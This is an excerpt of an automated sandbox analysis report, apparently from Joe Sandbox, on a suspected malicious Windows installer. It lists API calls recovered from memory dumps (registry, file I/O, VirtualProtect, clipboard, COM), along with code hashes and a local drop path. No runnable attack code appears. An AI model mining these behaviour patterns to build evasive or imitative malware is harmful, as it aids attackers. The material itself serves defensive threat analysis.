                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointerwsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 327478801-0
                                                                                                              • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                              • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                                                                              • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                              • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                                                                              APIs
                                                                                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                              • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                                              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                              • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                                              APIs
                                                                                                              • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2738559852-0
                                                                                                              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                              • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                              • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                              APIs
                                                                                                              • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040E629,0040CED0,004033DE,0040CED0,0040E629,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3934441357-0
                                                                                                              • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                              • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                              • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                              • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(701A505C,00000004,00000040,701A504C), ref: 701A29B1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2259069122.00000000701A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701A0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2259033794.00000000701A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2259096559.00000000701A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2259132821.00000000701A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_701a0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: dfb957271779552f7b9be968a3deaf4f9459743ec3beaa42ce04f248be0decaf
                                                                                                              • Instruction ID: f2b4e49ca954e7865ad52b9ff6a7a5204afd8bf5cb57d7c0c823798611a4e56f
                                                                                                              • Opcode Fuzzy Hash: dfb957271779552f7b9be968a3deaf4f9459743ec3beaa42ce04f248be0decaf
                                                                                                              • Instruction Fuzzy Hash: 80F0A5F2548380EEC350CF3A8E6470A3FF0B708308B35856AF188D6A62E3744444DB91
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 71445658-0
                                                                                                              • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                              • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                                                                              • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                              • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 973152223-0
                                                                                                              • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                              • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                              • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                              • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3850602802-0
                                                                                                              • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                              • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                                                              • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                              • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                              • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                                • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                              • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                              • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                              • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                              • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                              • EmptyClipboard.USER32 ref: 004058B7
                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                              • CloseClipboard.USER32 ref: 00405912
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                              • String ID: (7B${
                                                                                                              • API String ID: 590372296-525222780
                                                                                                              • Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                              • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                              • Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                              • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                              • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                                                                              • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                                • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                              • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: (7B$A$Call
                                                                                                              • API String ID: 2624150263-413618503
                                                                                                              • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                              • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                              • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                              • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                              APIs
                                                                                                              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Iw\Antndelsens, xrefs: 004021C3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateInstance
                                                                                                              • String ID: C:\Users\user\AppData\Local\Iw\Antndelsens
                                                                                                              • API String ID: 542301482-982084275
                                                                                                              • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                              • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                                                                                              • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                              • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFindFirst
                                                                                                              • String ID:
                                                                                                              • API String ID: 1974802433-0
                                                                                                              • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                              • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                                                                              • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                              • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                                                                              APIs
                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                              • GetSysColor.USER32(?), ref: 004045FE
                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                              • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                              • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                              • SetCursor.USER32(00000000), ref: 00404720
                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                              • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
